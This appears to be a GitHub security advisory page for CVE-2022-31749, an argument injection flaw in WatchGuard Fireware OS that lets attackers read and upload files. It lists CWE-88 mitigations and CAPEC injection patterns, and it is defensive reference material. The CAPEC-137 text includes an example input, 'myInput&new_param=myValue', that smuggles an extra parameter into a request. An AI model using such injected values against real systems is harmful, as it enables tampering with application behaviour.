Vulnerability from github – Published: 2025-01-28 00:32 – Updated: 2025-01-28 00:32An argument injection vulnerability in the diagnose and import pac commands in WatchGuard Fireware OS before 12.8.1, 12.1.4, and 12.5.10 allows an authenticated remote attacker with unprivileged credentials to upload or read files to limited, arbitrary locations on WatchGuard Firebox and XTM appliances
{
"affected": [],
"aliases": [
"CVE-2022-31749"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-28T00:15:06Z",
"severity": "MODERATE"
},
"details": "An argument injection vulnerability in the diagnose and import pac commands in WatchGuard Fireware OS before 12.8.1, 12.1.4, and 12.5.10 allows an authenticated remote attacker with unprivileged credentials to upload or read files to limited, arbitrary locations on WatchGuard Firebox and XTM appliances",
"id": "GHSA-94m6-39r7-r5v7",
"modified": "2025-01-28T00:32:15Z",
"published": "2025-01-28T00:32:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31749"
},
{
"type": "WEB",
"url": "https://www.rapid7.com/blog/post/2022/06/23/cve-2022-31749-watchguard-authenticated-arbitrary-file-read-write-fixed"
},
{
"type": "WEB",
"url": "https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2022-00019"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Parameterization
Where possible, avoid building a single string that contains the command and its arguments. Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command. For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments. In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter.
Mitigation
Strategy: Input Validation
Understand all the potential areas where untrusted inputs can enter your product: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained.
Mitigation
- Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.
- Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.
Mitigation
When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.
Mitigation
When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined.
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
CAPEC-137: Parameter Injection
An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value "myInput&new_param=myValue", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.
CAPEC-174: Flash Parameter Injection
An adversary takes advantage of improper data validation to inject malicious global parameters into a Flash file embedded within an HTML document. Flash files can leverage user-submitted data to configure the Flash document and access the embedding HTML document.
CAPEC-41: Using Meta-characters in E-mail Headers to Inject Malicious Payloads
This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.
CAPEC-460: HTTP Parameter Pollution (HPP)
An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.
CAPEC-88: OS Command Injection
In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.